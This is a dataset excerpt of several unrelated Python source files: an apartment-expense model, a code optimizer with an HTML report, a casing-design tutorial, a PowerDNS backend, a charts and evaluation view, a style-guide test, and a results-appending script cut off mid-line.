{"seq_id":"190071801","text":"from contasdoape.models.Despesa import Despesa \nfrom datetime import datetime\nfrom itertools import groupby\n\nclass MesFiscal():\n    def __init__(self, ape, data_inicio, data_fim):\n        params = {'data_inicio' : data_inicio, \n                  'data_fim' : data_fim, \n                  'ape' : ape}\n\n        for key, value in params.items():\n            if not value: raise ValueError(key)\n\n        self.data_inicio = data_inicio\n        self.data_fim = data_fim\n        self.ape = ape\n\n    def listar_despesas(self):\n        return [despesa for despesa in self.ape.despesas\n                if despesa.data >= self.data_inicio and \n                   despesa.data <= self.data_fim]\n\n    def calcular_saldo(self):\n        despesas = self.listar_despesas()\n        return sum(d.valor for d in despesas)\n\n    def nome_do_mes(self):\n        meses = {1 : 'Janeiro', 2 : 'Fevereiro', 3 : 'Março', 4 : 'Abril', \n                 5 : 'Maio', 6 : 'Junho', 7 : 'Julho', 8 : 'Agosto', \n                 9 : 'Setembro', 10 : 'Outubro', 11 : 'Novembro', 12 : 'Dezembro' }\n        \n        return meses[self.data_inicio.month]\n\n    def obter_despesas(self, autor=None):\n        despesas_por_autor = groupby(self.listar_despesas(), lambda d : d.autor)\n\n        if autor:\n            return next(list(despesas) for usuario, despesas in despesas_por_autor\n                        if usuario.id == autor.id )\n\n        return { autor : list(despesas) for autor, despesas in despesas_por_autor }\n\n    def obter_sumario(self):\n        autores = self.gastos_por_pessoa()\n\n        sumario = { 'nome' : self.nome_do_mes(),\n                    'total' : self.calcular_saldo() }\n\n        sumario.update(autores)\n\n        return sumario\n","sub_path":"contasdoape/models/MesFiscal.py","file_name":"MesFiscal.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"185426334","text":"from optimization.optGrammar import optimize\nfrom optimization.abstract.optimize import OptimizedInstruction\n\nlistaOpt = list()\n\ndef optimizeCode(entradaOpt:str):\n    listaOpt = optimize(entradaOpt)\n\n    generator = OptimizedGenerator()\n    #Try to optimize each instruction\n    for ins in listaOpt:\n        if isinstance(ins, OptimizedInstruction):\n            ins.optimize(generator)\n\n    #Append the instructions to the new doc\n    for ins in listaOpt:\n        if isinstance(ins, OptimizedInstruction):\n            ins.addToCode(generator)\n        elif isinstance(ins, str):\n            generator.addToCode(ins)\n\n    generator.makeCode()\n    generator.makeReport()\n\nclass OptimizedGenerator:\n    \"\"\"\n    Class in charge of generating optimized code\n    \"\"\"\n    def __init__(self) -> None:\n        self.report = list()\n        self.code = list()\n\n    def addToCode(self, text):\n        self.code.append(text+'\\n')\n\n    def toReport(self, text):\n        self.report.append(text +'\\n')\n\n    def genCode(self) -> str:\n        string = ''\n        string+=\"from goto import with_goto\\n\"\n        string+=\"from interpreter import execution\\n\"\n        string+=\"from c3d.stack import Stack\\n\"\n        for line in self.code:\n            string += line\n\n        return string\n\n    def genReport(self) -> str:\n        report = '''\n\n    \n    \n    Reporte de Optimización\n    \n\n\n\n    
<body>\n <div>\n <h1>Reporte de Optimización</h1>\n </div>\n <table>\n <tr><th>Instrucción Optimizada</th><th>Regla</th><th>Linea</th></tr>\n'''\n        for line in self.report:\n            report += line\n        report += '''\n </table>\n </body>\n</html>
\n\n'''\n return report\n\n def makeCode(self):\n code = self.genCode()\n with open('codigoOptimizado.py','w') as file:\n file.write(code)\n file.close()\n\n def makeReport(self):\n report = self.genReport()\n with open('reporteOptimizado.html','w') as file:\n file.write(report)\n file.close()\n","sub_path":"parser/fase2/team25/optimization/genOptimized.py","file_name":"genOptimized.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"644101408","text":"import json\n\n# get json file from score web interface\nfrom scorelib.converter import Converter\nfrom scorelib.design.casing_design import CasingDesign\nfrom scorelib.design.standards.n_2752_y_2014_design_standard import N2752Y2014SimpleConnectionTriaxialDesignStandard\nfrom scorelib.loads.backup_pressure.cementing_backup import CementingBackupAttributes, CementingBackup\nfrom scorelib.loads.collapse_loads.cementing_load import CementingAttributes, Cementing\nfrom scorelib.loads.scenarios.load_scenario import LoadScenario\n\nfrom parsers.score_project_json import JSONTest, convert_json\n\nwith open(\"C:/casing_selection-master/scripts/score_projects/project476.json\", 'r', encoding=\"latin-1\") as f:\n data = json.load(f)\n\ninstance = JSONTest()\ninstance.input = convert_json(data)\n\nproject = Converter.to_lccv_project(instance)\n\n# definir fase a ser analisada\ncasing_string = project.casing_strings[2]\n\n# definir e calcular carregamentos\nattributes = CementingAttributes(displacement_fluid=casing_string.displacement_fluid,\n surface_pressure_during_setting=casing_string.surface_pressure_during_setting)\ninternal_pressure_load = Cementing(project=project,\n casing_string=casing_string,\n attributes=attributes)\nbackup_attributes = CementingBackupAttributes(slurry_density=casing_string.slurry_density,\n mud_weight=casing_string.mud_weight,\n toc_md=casing_string.toc_md,\n second_slurry_density=casing_string.second_slurry_density,\n second_slurry_length=casing_string.second_slurry_length)\nbackup = CementingBackup(project=project,\n casing_string=casing_string,\n attributes=backup_attributes)\n\nresult = LoadScenario(internal_pressure_load=internal_pressure_load,\n external_pressure_load=backup\n ).solve()\n\ncasing_design = CasingDesign(string_sections=casing_string.string_sections,\n load_result=result,\n design_standard=N2752Y2014SimpleConnectionTriaxialDesignStandard)\n\nprint(casing_design.load_result.internal_profile)\nprint(casing_design.api_collapse_strength)\nprint(casing_design.load_result.external_profile)\nprint(casing_design.load_result.axial_profile)\n\nprint(casing_design.get_api_burst_safety_factor())\nprint(casing_design.get_api_collapse_safety_factor())\nprint(casing_design.get_api_axial_safety_factor())\nprint(casing_design.get_api_von_mises_safety_factor())\n\nprint(casing_design.get_api_barlow_failure_probability_profile())\nprint(casing_design.get_api_collapse_failure_probability_profile())\nprint(casing_design.get_api_axial_failure_probability_profile())\nprint(casing_design.get_von_mises_failure_probability_profile())\n","sub_path":"source/tutorial_json.py","file_name":"tutorial_json.py","file_ext":"py","file_size_in_byte":2959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"315584750","text":"# Copyright 2012 Hewlett-Packard Development Company, L.P. 
All Rights Reserved.\n# Copyright 2012 Managed I.T.\n#\n# Author: Patrick Galbraith \n# Author: Kiall Mac Innes \n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\nfrom sqlalchemy import Column, String, Text, Integer\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import exc as sqlalchemy_exceptions\nfrom moniker.openstack.common import cfg\nfrom moniker.openstack.common import log as logging\nfrom moniker import exceptions\nfrom moniker.backend import base\nfrom moniker.central import api as central_api\nfrom moniker.context import MonikerContext\nfrom moniker.sqlalchemy.session import get_session, SQLOPTS\nfrom moniker.sqlalchemy.models import Base as CommonBase\nfrom moniker.sqlalchemy.types import UUID\n\nLOG = logging.getLogger(__name__)\n\ncfg.CONF.register_group(cfg.OptGroup(\n name='backend:powerdns', title=\"Configuration for Powerdns Backend\"\n))\n\ncfg.CONF.register_opts(SQLOPTS, group='backend:powerdns')\n\n\nclass Base(CommonBase):\n id = Column(Integer, primary_key=True, autoincrement=True)\n\n\nBase = declarative_base(cls=Base)\n\n\nclass Domain(Base):\n __tablename__ = 'domains'\n\n moniker_id = Column(UUID, nullable=False)\n\n name = Column(String(255), nullable=False, unique=True)\n master = Column(String(128), nullable=True)\n last_check = Column(Integer, default=None, nullable=True)\n type = Column(String(6), nullable=False)\n notified_serial = Column(Integer, default=None, nullable=True)\n account = Column(String(40), default=None, nullable=True)\n\n\nclass Record(Base):\n __tablename__ = 'records'\n\n moniker_id = Column(UUID, nullable=False)\n\n domain_id = Column(Integer, default=None, nullable=True)\n name = Column(String(255), default=None, nullable=True)\n type = Column(String(10), default=None, nullable=True)\n content = Column(Text, default=None, nullable=True)\n ttl = Column(Integer, default=None, nullable=True)\n prio = Column(Integer, default=None, nullable=True)\n change_date = Column(Integer, default=None, nullable=True)\n\n\nclass PowerDNSBackend(base.Backend):\n __plugin_name__ = 'powerdns'\n\n def start(self):\n super(PowerDNSBackend, self).start()\n\n self.session = get_session(self.name)\n\n def create_domain(self, context, domain):\n admin_context = MonikerContext.get_admin_context()\n\n servers = central_api.get_servers(admin_context)\n\n domain_m = Domain()\n domain_m.update({\n 'moniker_id': domain['id'],\n 'name': domain['name'].rstrip('.'),\n 'master': servers[0]['name'].rstrip('.'),\n 'type': 'NATIVE',\n 'account': context.tenant_id\n })\n domain_m.save(self.session)\n\n for server in servers:\n record_m = Record()\n record_m.update({\n 'moniker_id': server['id'],\n 'domain_id': domain_m.id,\n 'name': domain['name'].rstrip('.'),\n 'type': 'NS',\n 'content': server['name'].rstrip('.')\n })\n record_m.save(self.session)\n\n # NOTE(kiall): Do the SOA last, ensuring we don't trigger a NOTIFY\n # before the NS records are in place.\n record_m = Record()\n record_m.update({\n 'moniker_id': domain['id'],\n 'domain_id': 
domain_m.id,\n 'name': domain['name'].rstrip('.'),\n 'type': 'SOA',\n 'content': self._build_soa_content(domain)\n })\n record_m.save(self.session)\n\n def update_domain(self, context, domain):\n domain_m = self._get_domain(domain['id'])\n\n soa_record_m = self._get_record(domain=domain_m, type='SOA')\n\n soa_record_m.update({\n 'content': self._build_soa_content(domain)\n })\n\n soa_record_m.save(self.session)\n\n def delete_domain(self, context, domain):\n domain_m = self._get_domain(domain['id'])\n domain_m.delete(self.session)\n\n self.session.query(Record).filter_by(domain_id=domain_m.id).delete()\n\n def create_record(self, context, domain, record):\n domain_m = self._get_domain(domain['id'])\n record_m = Record()\n\n record_m.update({\n 'moniker_id': record['id'],\n 'domain_id': domain_m.id,\n 'name': record['name'].rstrip('.'),\n 'type': record['type'],\n 'content': record['data'],\n 'ttl': record['ttl'],\n 'prio': record['priority']\n })\n\n record_m.save(self.session)\n\n def update_record(self, context, domain, record):\n record_m = self._get_record(record['id'])\n\n record_m.update({\n 'name': record['name'].rstrip('.'),\n 'type': record['type'],\n 'content': record['data'],\n 'ttl': record['ttl'],\n 'prio': record['priority']\n })\n\n record_m.save(self.session)\n\n def delete_record(self, context, domain, record):\n record_m = self._get_record(record['id'])\n record_m.delete(self.session)\n\n def _build_soa_content(self, domain):\n return \"%s %s. %d %d %d %d %d\" % (domain['name'],\n domain['email'].replace(\"@\", \".\"),\n domain['serial'],\n domain['refresh'],\n domain['retry'],\n domain['expire'],\n domain['minimum'])\n\n def _get_domain(self, domain_id):\n query = self.session.query(Domain)\n\n try:\n domain = query.filter_by(moniker_id=domain_id).one()\n except sqlalchemy_exceptions.NoResultFound:\n raise exceptions.Backend('No domain found')\n except sqlalchemy_exceptions.MultipleResultsFound:\n raise exceptions.Backend('Too many domains found')\n else:\n return domain\n\n def _get_record(self, record_id=None, domain=None, type=None):\n query = self.session.query(Record)\n\n if record_id:\n query = query.filter_by(moniker_id=record_id)\n\n if type:\n query = query.filter_by(type=type)\n\n if domain:\n query = query.filter_by(domain_id=domain.id)\n\n try:\n record = query.one()\n except sqlalchemy_exceptions.NoResultFound:\n raise exceptions.Backend('No record found')\n except sqlalchemy_exceptions.MultipleResultsFound:\n raise exceptions.Backend('Too many records found')\n else:\n return record\n","sub_path":"moniker/backend/impl_powerdns.py","file_name":"impl_powerdns.py","file_ext":"py","file_size_in_byte":7166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"135106543","text":"from geoalchemy2 import functions as geofunctions\nfrom pyramid.httpexceptions import HTTPNotFound\nfrom pyramid.renderers import render_to_response\nfrom pyramid.testing import DummyRequest\nfrom pyramid.view import view_config\nfrom sqlalchemy import cast, Float, func, distinct, select\nfrom webob.multidict import MultiDict\n\nfrom lokp.config.customization import get_customized_template_path\nfrom lokp.models import Stakeholder, SH_Tag_Group, SH_Tag, SH_Key, SH_Value, \\\n DBSession, Activity, A_Tag_Group, A_Tag, A_Key, A_Value, Language, \\\n Profile, Involvement\nfrom lokp.protocols.activity_protocol import ActivityProtocol\nfrom lokp.protocols.stakeholder_protocol import StakeholderProtocol\nfrom lokp.utils.views import 
validate_item_type, get_current_locale, \\\n get_current_profile\nfrom lokp.views.base import BaseView\nfrom lokp.views.translation import get_profiles, get_translated_db_keys\n\n\nclass ChartsView(BaseView):\n\n @view_config(route_name='charts_overview')\n def charts_overview(self):\n\n return render_to_response(\n get_customized_template_path(self.request, 'charts_view.mak'),\n self.get_base_template_values(), self.request)\n\n @view_config(route_name='charts')\n @view_config(route_name='charts_no_slash')\n def charts(self):\n\n template_values = self.template_values\n\n chart_type = self.request.matchdict.get('type', 'bars')\n if chart_type == 'bars':\n params = self.request.matchdict.get('params')\n if params == ('sh',):\n template = 'barchart_sh'\n else:\n template = 'barchart_a'\n elif chart_type == 'stackedbars':\n template = 'stackedbarchart'\n elif chart_type == 'map':\n template = 'mapchart'\n profiles = sorted(get_profiles(), key=lambda profile: profile[0])\n profiles.append(('global', 'global'))\n template_values.update({\n 'profiles': profiles\n })\n else:\n return HTTPNotFound()\n\n attr = self.request.params.get('attr', 0)\n\n template_values.update({\n 'attr': attr\n })\n\n return render_to_response(\n get_customized_template_path(\n self.request, 'charts/%s.mak' % template),\n template_values, self.request)\n\n\nclass EvaluationView(BaseView):\n\n @view_config(route_name='evaluation', renderer='json')\n def evaluation(self, data=None):\n\n ret = {'success': False}\n\n json_data = self.request.json_body if data is None else data\n if json_data is None:\n ret['msg'] = 'No data provided'\n return ret\n\n if validate_item_type(json_data.get('item', 'a')) == 'sh':\n self.db_item = Stakeholder\n self.db_taggroup = SH_Tag_Group\n self.db_tag = SH_Tag\n self.db_key = SH_Key\n self.db_value = SH_Value\n self.protocol = StakeholderProtocol(DBSession)\n else:\n self.db_item = Activity\n self.db_taggroup = A_Tag_Group\n self.db_tag = A_Tag\n self.db_key = A_Key\n self.db_value = A_Value\n self.protocol = ActivityProtocol(DBSession)\n\n # Make sure the json is valid\n if 'group_by' not in json_data:\n ret['msg'] = \"Missing parameter 'group by': At least one column \"\n \"needs to be specified.\"\n return ret\n if not isinstance(json_data['group_by'], list):\n ret['msg'] = \"Parameter 'group by' needs to be an array.\"\n return ret\n if 'attributes' not in json_data:\n ret['msg'] = \"Missing attributes: No attributes were specified.\"\n return ret\n for attr in json_data['attributes']:\n test, msg = self._check_function(\n json_data['attributes'][attr], attr)\n if test is not True:\n ret['msg'] = msg\n return ret\n if 'locales' in json_data and not isinstance(\n json_data['locales'], list):\n ret['msg'] = \"Parameter 'locales' needs to be an array.\"\n return ret\n translate_keys = json_data.get('translate', {}).get('keys', [])\n if translate_keys and not isinstance(translate_keys, list):\n ret['msg'] = \"Parameter 'translate[\\'keys\\']' needs to be an \"\n \"array.\"\n return ret\n # for k in translate_keys:\n # if not isinstance(k, list):\n # ret['msg'] = \"Value of 'translate[\\'keys\\']' needs to be \"\n # \"an array of arrays.\"\n # return ret\n a_ids = json_data.get('a_ids', [])\n if not isinstance(a_ids, list):\n ret['msg'] = \"Parameter 'a_ids' needs to be an array.\"\n return ret\n # for i in a_ids:\n # if not isinstance(i, str):\n # ret['msg'] = \"Entries of parameter 'a_ids' need to be \"\n # \"strings (the UUIDs of Activities)\"\n # return ret\n sh_ids = 
json_data.get('sh_ids', [])\n if not isinstance(sh_ids, list):\n ret['msg'] = \"Parameter 'sh_ids' needs to be an array.\"\n return ret\n # for i in sh_ids:\n # if not isinstance(i, str):\n # ret['msg'] = \"Entries of parameter 'sh_ids' need to be \"\n # \"strings (the UUIDs of Stakeholders)\"\n # return ret\n if self.db_item == Activity:\n this_id_filter = a_ids\n other_id_filter = sh_ids\n else:\n this_id_filter = sh_ids\n other_id_filter = a_ids\n\n this_filter = []\n other_filter = []\n if 'filter' in json_data:\n params = []\n for filters in json_data.get('filter', '').split('&'):\n try:\n f = filters.split('=')\n if len(f) == 2:\n params.append((f[0], f[1]))\n except:\n pass\n # Simulate a request to send the filters\n req = DummyRequest()\n req.params = MultiDict(params)\n a_tag_filter, __, sh_tag_filter, __ = self.protocol._filter(req)\n if self.db_item == Activity:\n this_filter = a_tag_filter\n other_filter = sh_tag_filter\n else:\n this_filter = sh_tag_filter\n other_filter = a_tag_filter\n\n isInvolvementRequired = (\n self.db_item == Stakeholder\n or len(other_filter) + len(other_id_filter) > 0)\n\n # Collect all keys to be translated (values are translated in the\n # query)\n locales = ['default']\n langs = []\n locales.extend(json_data.get('locales', []))\n translated_keys = {}\n exclude_from_translation = ['Activity', 'Stakeholder']\n keys = []\n for key, __ in json_data.get('attributes', {}).items():\n if key not in exclude_from_translation and key not in keys:\n keys.append(key)\n for key in json_data.get('group_by', []):\n if key not in exclude_from_translation and key not in keys:\n keys.append(key)\n for key in translate_keys:\n for k in key:\n if k not in keys:\n keys.append(k)\n for l in locales:\n locale = l\n if l == 'default':\n locale = get_current_locale(self.request)\n db_lang = DBSession.query(Language).filter(\n Language.locale == locale).first()\n langs.append((l, db_lang))\n translated_keys[l] = get_translated_db_keys(\n self.db_key, keys, db_lang)\n\n # Get groups\n groups_subqueries, groups_columns = self._get_group_by(\n json_data['group_by'], langs)\n\n # Get functions\n functions_subqueries, functions_columns = \\\n self._get_attribute_functions(json_data['attributes'])\n\n # Prepare basic query\n q = DBSession.query(*groups_columns + functions_columns). \\\n join(self.db_taggroup). \\\n join(self.db_item)\n\n # Join with further groups\n for g_sq in groups_subqueries[1:]:\n q = q.outerjoin(g_sq, g_sq.c.item_id == self.db_item.id)\n\n # Join with functions\n for f_sq in functions_subqueries:\n q = q.outerjoin(f_sq, f_sq.c.item_id == self.db_item.id)\n\n # Apply status filter (fix: active)\n q = q.filter(self.db_item.fk_status == 2)\n\n if (this_id_filter):\n q = q.filter(self.db_item.identifier.in_(this_id_filter))\n\n # Apply filters\n filter_subqueries = self.protocol.Session.query(\n self.db_item.id.label('a_filter_id')\n )\n for x in this_filter:\n # Collect the IDs for each filter\n taggroups_sq = x.subquery()\n single_subquery = self.protocol.Session.query(\n self.db_item.id.label('a_filter_id')\n ). \\\n join(self.db_taggroup). \\\n join(taggroups_sq,\n taggroups_sq.c.a_filter_tg_id == self.db_taggroup.id). \\\n subquery()\n # Join each found ID with previously found IDs\n filter_subqueries = filter_subqueries. 
\\\n join(single_subquery,\n single_subquery.c.a_filter_id == self.db_item.id)\n filter_subqueries = filter_subqueries.subquery()\n q = q.join(\n filter_subqueries,\n filter_subqueries.c.a_filter_id == self.db_item.id)\n\n # Apply profile boundary filter\n if self.db_item == Activity:\n p = json_data.get('profile', get_current_profile(self.request))\n profile = DBSession.query(Profile). \\\n filter(Profile.code == p). \\\n first()\n if profile is not None:\n q = q.filter(geofunctions.ST_Intersects(\n self.db_item.point, profile.geometry))\n\n # Apply grouping and ordering\n q = q.group_by(*groups_columns). \\\n order_by(groups_columns[0])\n\n if isInvolvementRequired:\n if self.db_item == Stakeholder:\n inv_subquery = DBSession.query(\n Involvement.fk_stakeholder.label('id')\n ). \\\n join(Activity). \\\n filter(Activity.fk_status == 2)\n p = json_data.get('profile', get_current_profile(self.request))\n profile = DBSession.query(Profile). \\\n filter(Profile.code == p). \\\n first()\n if profile is not None:\n inv_subquery = inv_subquery.filter(geofunctions.ST_Intersects(\n Activity.point, profile.geometry))\n other_db_item = Activity\n other_db_taggroup = A_Tag_Group\n else:\n inv_subquery = DBSession.query(\n Involvement.fk_activity.label('id')\n ). \\\n join(Stakeholder). \\\n filter(Stakeholder.fk_status == 2)\n other_db_item = Stakeholder\n other_db_taggroup = SH_Tag_Group\n\n if (other_id_filter):\n inv_subquery = inv_subquery.filter(\n other_db_item.identifier.in_(other_id_filter))\n\n # Apply filters\n filter_subqueries = self.protocol.Session.query(\n other_db_item.id.label('a_filter_id')\n )\n\n for x in other_filter:\n # Collect the IDs for each filter\n taggroups_sq = x.subquery()\n try:\n single_subquery = self.protocol.Session.query(\n other_db_item.id.label('a_filter_id')\n ). \\\n join(other_db_taggroup). \\\n join(taggroups_sq,\n taggroups_sq.c.a_filter_tg_id == other_db_taggroup.id). \\\n subquery()\n except AttributeError:\n single_subquery = self.protocol.Session.query(\n other_db_item.id.label('a_filter_id')\n ). \\\n join(other_db_taggroup). \\\n join(taggroups_sq,\n taggroups_sq.c.sh_filter_tg_id == other_db_taggroup.id). \\\n subquery()\n # Join each found ID with previously found IDs\n filter_subqueries = filter_subqueries. 
\\\n join(single_subquery,\n single_subquery.c.a_filter_id == other_db_item.id)\n\n filter_subqueries = filter_subqueries.subquery()\n inv_subquery = inv_subquery.join(\n filter_subqueries,\n filter_subqueries.c.a_filter_id == other_db_item.id)\n\n inv_subquery = inv_subquery.subquery()\n q = q.filter(self.db_item.id.in_(\n select([inv_subquery.c.id])\n ))\n\n data = []\n for res in q.all():\n data = _handle_single_line(\n data, res, json_data.get('group_by'),\n json_data.get('attributes'), translated_keys)\n\n # Do a translation of groupable if available\n groupable_translated = []\n for key in translate_keys:\n translations = []\n for k in key:\n t = {\n 'key': k,\n 'default': k\n }\n for locale, key_translations in translated_keys.items():\n translation = (\n None if k not in exclude_from_translation else k)\n for k_t in key_translations:\n if len(k_t) >= 2 and k_t[0] == k:\n translation = k_t[1]\n t[locale] = translation\n translations.append(t)\n groupable_translated.append(translations)\n if len(groupable_translated):\n ret.update({\n 'translate': {'keys': groupable_translated}\n })\n\n ret.update({\n 'success': True,\n 'data': data\n })\n\n return ret\n\n def _get_group_by(self, group_by, langs):\n \"\"\"\n Returns\n - an array with SubQueries\n - an array with Columns to select from\n \"\"\"\n subqueries = []\n columns = []\n for i, group_key in enumerate(group_by):\n # first one different\n if i == 0:\n subquery = DBSession.query(\n self.db_value.value.label('v'),\n self.db_tag.fk_tag_group.label('tg_id')\n ). \\\n join(\n self.db_tag,\n self.db_tag.fk_value == self.db_value.id). \\\n join(self.db_key, self.db_key.id == self.db_tag.fk_key). \\\n filter(self.db_key.key == group_key). \\\n filter(self.db_key.fk_language == None)\n else:\n subquery = DBSession.query(\n self.db_item.id.label('item_id'),\n self.db_value.value.label('v'),\n ). \\\n join(\n self.db_taggroup,\n self.db_taggroup.fk_item == self.db_item.id). \\\n join(\n self.db_tag,\n self.db_taggroup.id == self.db_tag.fk_tag_group). \\\n join(\n self.db_value,\n self.db_value.id == self.db_tag.fk_value). \\\n join(self.db_key, self.db_key.id == self.db_tag.fk_key). \\\n filter(self.db_key.key == group_key). \\\n filter(self.db_key.fk_language == None)\n for l in langs:\n __, value_translation = self.protocol._get_translatedKV(\n l[1], self.db_key, self.db_value)\n subquery = subquery.add_columns(\n value_translation.c.value_translated.label(l[0]))\n subquery = subquery. \\\n outerjoin(\n value_translation,\n value_translation.c.value_original_id ==\n self.db_value.id)\n subquery = subquery.subquery()\n\n subqueries.append(subquery)\n\n columns.append(subquery.c.v)\n for l in langs:\n columns.append(subquery.c[l[0]])\n\n return subqueries, columns\n\n def _get_attribute_functions(self, attributes):\n \"\"\"\n Returns\n - an array with SubQueries\n - an array with Columns to select from\n \"\"\"\n subqueries = []\n columns = []\n for attr in attributes:\n function = attributes[attr]\n if function == 'sum':\n sq = DBSession.query(\n self.db_item.id.label('item_id'),\n cast(self.db_value.value, Float).label('v')\n ). \\\n join(self.db_taggroup). \\\n join(\n self.db_tag,\n self.db_taggroup.id == self.db_tag.fk_tag_group). \\\n join(\n self.db_value,\n self.db_value.id == self.db_tag.fk_value). \\\n join(self.db_key, self.db_key.id == self.db_tag.fk_key). \\\n filter(self.db_key.key == attr). 
\\\n subquery()\n subqueries.append(sq)\n columns.append(func.sum(sq.c.v))\n elif function == 'count' or function == 'count distinct':\n if attr == 'Activity' or attr == 'Stakeholder':\n columns.append(func.count())\n else:\n sq = DBSession.query(\n self.db_item.id.label('item_id'),\n self.db_value.value.label('v')\n ). \\\n join(self.db_taggroup). \\\n join(\n self.db_tag,\n self.db_taggroup.id == self.db_tag.fk_tag_group). \\\n join(self.db_value). \\\n join(self.db_key). \\\n filter(self.db_key.key == attr). \\\n subquery()\n subqueries.append(sq)\n if (function == 'count distinct'):\n columns.append(func.count(distinct(sq.c.v)))\n else:\n columns.append(func.count(sq.c.v))\n return subqueries, columns\n\n def _check_function(self, function, attr):\n \"\"\"\n Returns True if a function is predefined and if targeted\n attribute is of valid type (where needed)\n \"\"\"\n if function == 'sum':\n if self._cast_to_number(attr):\n return True, ''\n else:\n return False, \"Invalid type for function '%s': '%s' should \"\n \"contain only number values.\" % (function, attr)\n if function == 'count':\n return True, ''\n if function == 'count distinct':\n return True, ''\n else:\n return False,\n \"Unknown function: '%s' is not a predefined function.\" % function\n\n def _cast_to_number(self, key):\n \"\"\"\n Returns True if the given key has number values\n \"\"\"\n q = DBSession.query(cast(self.db_value.value, Float)). \\\n join(self.db_tag). \\\n join(self.db_key). \\\n filter(self.db_key.key == key)\n try:\n q.all()\n return True\n except:\n return False\n\n\ndef _handle_single_line(\n data, res_total, group_by, attributes, translated_keys):\n\n group_by_res = res_total[:len(group_by) * (len(translated_keys) + 1)]\n attributes_res = res_total[len(group_by) * (len(translated_keys) + 1):]\n\n entry = None\n\n for e in data:\n if e.get('group', {}).get('value', {}).get('value') == group_by_res[0]:\n entry = e\n\n if entry is None:\n\n default = group_by[0]\n for k in translated_keys.get('default', []):\n if len(k) >= 2 and k[0] == group_by[0]:\n default = k[1]\n entry = {\n 'group': {\n 'key': {\n 'key': group_by[0],\n 'default': default\n },\n 'value': {\n 'value': group_by_res[0],\n 'default': (\n group_by_res[1] if group_by_res[1] is not None\n else group_by_res[0])\n }\n }\n }\n\n i = 0\n for locale, key_translations in translated_keys.items():\n # Key\n if locale == 'default':\n continue\n t = None\n for k in key_translations:\n if len(k) >= 2 and k[0] == group_by[0]:\n t = k[1]\n entry.get('group', {}).get('key', {})[locale] = t\n # Value\n entry.get('group', {}).get('value', {})[locale] = (\n group_by_res[i + 2])\n i += 1\n\n data.append(entry)\n\n rest_res = res_total[2:]\n rest_group_by = group_by[1:]\n if len(rest_res) > len(attributes_res) and len(rest_group_by):\n entry_data = entry.get('children', [])\n entry['children'] = _handle_single_line(\n entry_data, rest_res, rest_group_by, attributes, translated_keys)\n else:\n entry_attributes = []\n for i, attr in enumerate(attributes):\n key = {\n 'key': attr,\n 'default': attr\n }\n for locale, key_translations in translated_keys.items():\n t = None if attr not in ['Activity', 'Stakeholder'] else attr\n for k in key_translations:\n if len(k) >= 2 and k[0] == attr:\n t = k[1]\n key[locale] = t\n entry_attributes.append({\n 'key': key,\n 'value': attributes_res[i],\n 'function': attributes[attr]\n })\n entry['values'] = entry_attributes\n\n return 
data\n","sub_path":"lokp/views/charts.py","file_name":"charts.py","file_ext":"py","file_size_in_byte":22490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"333070380","text":"# -*- coding: utf-8 -*-\n\nimport pytest\n\nfrom wemake_python_styleguide.visitors.wrong_class import (\n RequiredBaseClassViolation,\n WrongClassVisitor,\n)\n\n\ndef test_wrong_base_class(assert_errors, parse_ast_tree):\n \"\"\"Testing that not using explicit base class with forbiden.\"\"\"\n tree = parse_ast_tree(\"\"\"\n class WithoutBase: ...\n \"\"\")\n\n visiter = WrongClassVisitor()\n visiter.visit(tree)\n\n assert_errors(visiter, [RequiredBaseClassViolation])\n\n\n@pytest.mark.parametrize('base', [\n 'object',\n 'dict',\n 'CustomClass',\n 'Multiple, Classes, Mixins',\n 'Custom, keyword=1',\n])\ndef test_regular_base_classes(assert_errors, parse_ast_tree, base):\n \"\"\"Testing that regular base classes work.\"\"\"\n tree = parse_ast_tree(\"\"\"\n class Example({0}): ...\n \"\"\".format(base))\n\n visiter = WrongClassVisitor()\n visiter.visit(tree)\n\n assert_errors(visiter, [])\n","sub_path":"tests/test_visitors/test_wrong_class/test_base_class.py","file_name":"test_base_class.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"191678516","text":"###############################################################################\n# Imports\n\nimport os.path\nimport csv\n\nfrom os import listdir\nfrom os.path import isfile, join\n\n###############################################################################\n\n###############################################################################\n# Main and Functions\n\ndef main():\n\n\tcreate_folder(\"appended_results\")\n\n\tfilenames = find_filenames()\n\n\twith open('appended_results/appended_results.txt', 'w') as outfile:\n\t for fname in filenames:\n\t with open('Data/' + fname) as infile:\n\t outfile.write(infile.read())\n\n\treplace_headers()\n\n\tadd_main_header()\n\n\tdelete_temp_files()\n\n# Iterates through all files in the data folder and finds their filenames.\n\ndef find_filenames():\n\n\tfilenames = [ f for f in listdir(\"Data/\") if isfile(join(\"Data/\",f)) ]\n\n\treturn(filenames)\n\n# Creates a folder to put the results in.\n\ndef create_folder(folder_name):\n\n\tif not os.path.exists(folder_name):\n\t\tos.makedirs(folder_name)\n\n# Gets rid of all of the headers in the file\n\ndef replace_headers():\n\n\tinfile = 'appended_results/appended_results.txt'\n\toutfile = 'appended_results/clean_appended_results.txt'\n\n\tdelete_list = ['N, Q, S, P_0, P_1, P_2, R_1, R_2, A_1, A_2, \\n']\n\tfin = open(infile)\n\tfout = open(outfile, \"w+\")\n\tfor line in fin:\n\t for word in delete_list:\n\t line = line.replace(word, \"\")\n\t fout.write(line)\n\tfin.close()\n\tfout.close()\n\n# Adds the main header to the whole file\n\ndef add_main_header():\n\n\tinfile = 'appended_results/clean_appended_results.txt'\n\toutfile = 'appended_results/final_appended_results.txt'\n\n\tfin = open(infile)\n\tfout = open(outfile, 